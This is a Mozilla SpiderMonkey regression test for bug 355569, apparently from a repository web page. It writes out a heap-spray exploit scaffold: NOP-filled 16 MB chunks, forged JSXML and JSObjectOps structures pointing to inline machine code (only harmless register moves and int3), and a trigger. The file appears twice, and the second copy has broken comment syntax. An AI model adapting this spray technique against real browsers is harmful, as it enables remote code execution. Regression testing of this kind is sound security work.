src/third_party/mozjs-45/js/src/tests/js1_8_5/regress/regress-355569.js - cobalt - Git at Google

 /* -*- indent-tabs-mode: nil; js-indent-level: 4 -*- */

 /* This Source Code Form is subject to the terms of the Mozilla Public
  * License, v. 2.0. If a copy of the MPL was not distributed with this
  * file, You can obtain one at http://mozilla.org/MPL/2.0/. */

 var bug = 355569;
 var actual = '';
 var expect = '';

 printBugNumber (bug);
 printStatus (summary);

 var targetAddress = 0x12030010;
 var sprayParams = {
   chunkSize: 16 * 1024 * 1024,
   chunkCount: 16,
   chunkMarker: 0xdeadface,
   chunkAlign: 0x1000,
   reservedSize: 1024
 };

 function makeExploitCode() {
   /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
   return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
 }

 /*==========================================================================*/
 /*==========================================================================*/

 function packData(template, A) {
   var n = 0, result = "", vl;
   for(var i = 0; i < template.length; i++) {
     var ch = template.charAt(i);
     if(ch == "s" || ch == "S") {
       vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff);
     } else if(ch == "l" || ch == "L") { // XXX endian
       vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff, vl >> 16);
     } else if(ch == "=") {
       result += String(A[n++]);
     }
   }
   return result;
 }
 function buildStructure(worker, address) {
   var offs = {}, result = "", context = {
     append: function(k, v) { offs[k] = result.length * 2; result += v; },
     address: function(k) { return address + ((k && offs[k]) || 0); }
   }; worker(context); result = ""; worker(context); return result;
 }
 function repeatToLength(s, L) {
   if(L <= s.length) { return s.substring(0, L); }
   while(s.length <= L/2) { s += s; }
   return s + s.substring(0, L - s.length);
 }
 function sprayData(data, params, rooter) {
   var marker = packData("L", [ params.chunkMarker ]);
   data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length);
   data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2);
   for(var i = 0; i < params.chunkCount; i++) {
     rooter[i] = marker + data + i;
   }
 }

 function T_JSObject(map, slots)
 { return packData("LL", arguments); }
 function T_JSObjectMap(nrefs, ops, nslots, freeslot)
 { return packData("LLLL", arguments); }
 function T_JSObjectOps(
   newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
   getProperty, setProperty, getAttributes, setAttributes,
   deleteProperty, defaultValue, enumerate, checkAccess,
   thisObject, dropProperty, call, construct,
   xdrObject, hasInstance, setProto, setParent,
   mark, clear, getRequiredSlot, setRequiredSlot
 ) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); }

 function T_JSXML_LIST(
   object, domnode, parent, name, xml_class, xml_flags,
   kids_length, kids_capacity, kids_vector, kids_cursors,
   xml_target, xml_targetprop
 ) { return packData("LLLLSS LLLL LL", arguments); }
 function T_JSXML_ELEMENT(
   object, domnode, parent, name, xml_class, xml_flags,
   kids_length, kids_capacity, kids_vector, kids_cursors,
   nses_length, nses_capacity, nses_vector, nses_cursors,
   atrs_length, atrs_capacity, atrs_vector, atrs_cursors
 ) { return packData("LLLLSS LLLL LLLL LLLL", arguments); }

 /*==========================================================================*/
 /*==========================================================================*/

 function makeExploitData(address) {
   return buildStructure(function(ctx) {
     ctx.append("xml-list",
       T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0));
     ctx.append("xml-kids-vector",
       packData("L", [ ctx.address("xml-element") ]));
     ctx.append("xml-element",
       T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /*c*/ 0, 0, 0, 0, /*d*/ 0, 0, 0, 0));
     ctx.append("object",
       T_JSObject(ctx.address("object-map"), 0));
     ctx.append("object-map",
       T_JSObjectMap(0, ctx.address("object-ops"), 0, 0));
     ctx.append("object-ops",
       T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0));
     ctx.append("exploit-code",
       makeExploitCode(ctx));
   }, address);
 }

 function exploit() {
   sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {});
   var numobj = new Number(targetAddress >> 1);
   printStatus("probably not exploitable");
 }

 try
 {
     exploit();
 }
 catch(ex)
 {
 }

 reportCompare(expect, actual);
	/* -- indent-tabs-mode: nil; js-indent-level: 4 -- */

	/* This Source Code Form is subject to the terms of the Mozilla Public
	* License, v. 2.0. If a copy of the MPL was not distributed with this
	* file, You can obtain one at http://mozilla.org/MPL/2.0/. */

	var bug = 355569;
	var actual = '';
	var expect = '';

	printBugNumber (bug);
	printStatus (summary);

	var targetAddress = 0x12030010;
	var sprayParams = {
	chunkSize: 16 * 1024 * 1024,
	chunkCount: 16,
	chunkMarker: 0xdeadface,
	chunkAlign: 0x1000,
	reservedSize: 1024
	};

	function makeExploitCode() {
	/* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
	return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
	}

	/==========================================================================/
	/==========================================================================/

	function packData(template, A) {
	var n = 0, result = "", vl;
	for(var i = 0; i < template.length; i++) {
	var ch = template.charAt(i);
	if(ch == "s" \|\| ch == "S") {
	vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff);
	} else if(ch == "l" \|\| ch == "L") { // XXX endian
	vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff, vl >> 16);
	} else if(ch == "=") {
	result += String(A[n++]);
	}
	}
	return result;
	}
	function buildStructure(worker, address) {
	var offs = {}, result = "", context = {
	append: function(k, v) { offs[k] = result.length * 2; result += v; },
	address: function(k) { return address + ((k && offs[k]) \|\| 0); }
	}; worker(context); result = ""; worker(context); return result;
	}
	function repeatToLength(s, L) {
	if(L <= s.length) { return s.substring(0, L); }
	while(s.length <= L/2) { s += s; }
	return s + s.substring(0, L - s.length);
	}
	function sprayData(data, params, rooter) {
	var marker = packData("L", [ params.chunkMarker ]);
	data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length);
	data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2);
	for(var i = 0; i < params.chunkCount; i++) {
	rooter[i] = marker + data + i;
	}
	}

	function T_JSObject(map, slots)
	{ return packData("LL", arguments); }
	function T_JSObjectMap(nrefs, ops, nslots, freeslot)
	{ return packData("LLLL", arguments); }
	function T_JSObjectOps(
	newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
	getProperty, setProperty, getAttributes, setAttributes,
	deleteProperty, defaultValue, enumerate, checkAccess,
	thisObject, dropProperty, call, construct,
	xdrObject, hasInstance, setProto, setParent,
	mark, clear, getRequiredSlot, setRequiredSlot
	) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); }

	function T_JSXML_LIST(
	object, domnode, parent, name, xml_class, xml_flags,
	kids_length, kids_capacity, kids_vector, kids_cursors,
	xml_target, xml_targetprop
	) { return packData("LLLLSS LLLL LL", arguments); }
	function T_JSXML_ELEMENT(
	object, domnode, parent, name, xml_class, xml_flags,
	kids_length, kids_capacity, kids_vector, kids_cursors,
	nses_length, nses_capacity, nses_vector, nses_cursors,
	atrs_length, atrs_capacity, atrs_vector, atrs_cursors
	) { return packData("LLLLSS LLLL LLLL LLLL", arguments); }

	/==========================================================================/
	/==========================================================================/

	function makeExploitData(address) {
	return buildStructure(function(ctx) {
	ctx.append("xml-list",
	T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0));
	ctx.append("xml-kids-vector",
	packData("L", [ ctx.address("xml-element") ]));
	ctx.append("xml-element",
	T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /c/ 0, 0, 0, 0, /d/ 0, 0, 0, 0));
	ctx.append("object",
	T_JSObject(ctx.address("object-map"), 0));
	ctx.append("object-map",
	T_JSObjectMap(0, ctx.address("object-ops"), 0, 0));
	ctx.append("object-ops",
	T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0));
	ctx.append("exploit-code",
	makeExploitCode(ctx));
	}, address);
	}

	function exploit() {
	sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {});
	var numobj = new Number(targetAddress >> 1);
	printStatus("probably not exploitable");
	}

	try
	{
	exploit();
	}
	catch(ex)
	{
	}

	reportCompare(expect, actual);